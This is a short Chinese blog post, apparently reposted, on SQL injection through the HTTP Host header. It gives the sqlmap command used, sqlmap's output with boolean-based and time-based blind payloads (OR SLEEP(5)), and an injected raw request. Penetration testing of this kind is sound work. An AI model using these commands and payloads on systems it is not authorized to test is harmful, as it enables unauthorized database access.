博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
对 HTTP 请求的 Host 参数进行 SQL 注入
阅读量:6960 次
发布时间:2019-06-27

本文共 1067 字,大约阅读时间需要 3 分钟。

最近收到了一个漏洞通报,居然是对 HTTP 请求的 Host 参数进行 SQL 注入,比较有趣,需要总结一下。

如下是经过简化的具体的渗透测试命令,假设主机名为 aaa.bbb.ccc:

$ more sql.txt   GET / HTTP/1.1Host: aaa.bbb.ccc*$ sqlmap --host http://aaa.bbb.ccc -r sql.txt --random-agent -p Host --risk 3 --dbms mysql  --current-user --is-dba —tables...sqlmap identified the following injection point(s) with a total of 306 HTTP(s) requests:---Parameter: Host #1* ((custom) HEADER)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: -6117') OR 9754=9754 AND ('EXWO'='EXWO    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 OR time-based blind    Payload: aaa.bbb.ccc') OR SLEEP(5) AND ('UnAw'='UnAw---...

渗透过程中 sqlmap 会生成类似如下的 HTTP 请求,以进行 SQL 注入测试,通过 -v3 参数可以看到:

GET / HTTP/1.1Host: aaa.bbb.ccc') OR SLEEP(5) AND ('hxje'='hxjeReferer: http://aaa.bbb.ccc:80/User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Firefox/2.0.0.8Connection: close

正常情况下,使用 --level 3 参数时 sqlmap 会测试一些 HTTP 请求头的参数,但不会测试 Host 参数,所以需要使用 -p Host 参数来指定测试。

此外由于 Host 参数与伪静态页面类似,所以还需要用 * 星号标记一下注入点。

转载地址:http://gemil.baihongyu.com/

你可能感兴趣的文章
搭建个人网站需要的三个步骤
查看>>
matlab建立双坐标
查看>>
Linux操作命令(六)
查看>>
1、压滤机工作原理
查看>>
设计模式学习总结-桥接模式(Bridge Pattern)
查看>>
halcon算子翻译——copy_image
查看>>
使用Haar分类器进行面部检测
查看>>
参数化(四):处理非均匀数据分布
查看>>
Makefile-2
查看>>
获取页面中出现次数最多的三个标签以及出现次数
查看>>
访问WEB-INF目录中的文件
查看>>
web接口开发与测试
查看>>
php -- php控制linux关机、重启、注销
查看>>
867. Transpose Matrix
查看>>
十.python面向对象(itme)
查看>>
Python下selenium的简单用法
查看>>
multiset的应用
查看>>
我的mysql的学习记录
查看>>
Codeforces Round #416 (Div. 2)(A,思维题,暴力,B,思维题,暴力)
查看>>
NYOJ 题目77 开灯问题(简单模拟)
查看>>